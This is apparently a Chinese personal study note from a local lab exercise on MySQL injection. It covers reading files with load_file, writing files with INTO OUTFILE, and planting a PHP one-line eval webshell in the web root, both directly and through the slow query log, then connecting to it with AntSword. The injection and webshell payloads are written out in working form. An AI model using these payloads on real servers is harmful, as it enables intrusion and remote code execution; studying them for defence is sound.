root高权限读写注入
load_file 读取文件
大姐我真是整了半天都是nullnullnull缝子
结果看了半天这个my.ini是被隐藏的大哥
load_file()读取文件结果为null_mysql load_file返回null解决办法_黑小薛的博客-CSDN博客
终于读出来了
此时参数值系统变量 secure_file_priv已经被修改
原本此处变量值为 NULL,即没设置允许操作的目录,所以没法导出到文件。
这个变量就可以用来限制操作路径
into_outfile 写入文件
?param=0' union select 1,2,3,4,'a' into outfile 'e:/2.txt'--+
我们可以看到2.txt被写入
我们可以写入一句话木马
?param=0' union select 1,2,3,4,'<?php eval($_POST[a]);?>' into outfile 'D:/phpstudy_pro/WWW/c.php'--+
先检查一下是否上传成功
用蚁剑发现连接成功了v
太搞笑了连接自己
那么如果把my.ini内的参数secure_file_priv设置在c盘目录下
secure_file_priv=c:/我们可以发现我们就只能在c盘进行操作
mysql写马
set global slow_query_log=1;
set global slow_query_log_file='D:\\phpstudy_pro\\WWW\d.php'
D:\\phpstudy_pro\\WWW\d.php---------》shell路径
可以看到有了d.php
select '<?php eval($ POST[a])?>' or SLEEP(1);
但是!!!
我发现如果sleep的少,并不会记录到日志中去
要sleep的久一点
Mysql注入写Shell读文件总结 - FreeBuf网络安全行业门户
select "<?php eval($_POST[aaaaaa]);?>" or sleep(11);
可以看一下我们的日志d.php
因为尝试了很多次。。所以有很多
我们可以发现都是sleep(11)的被记录了
蚁剑连一下看看
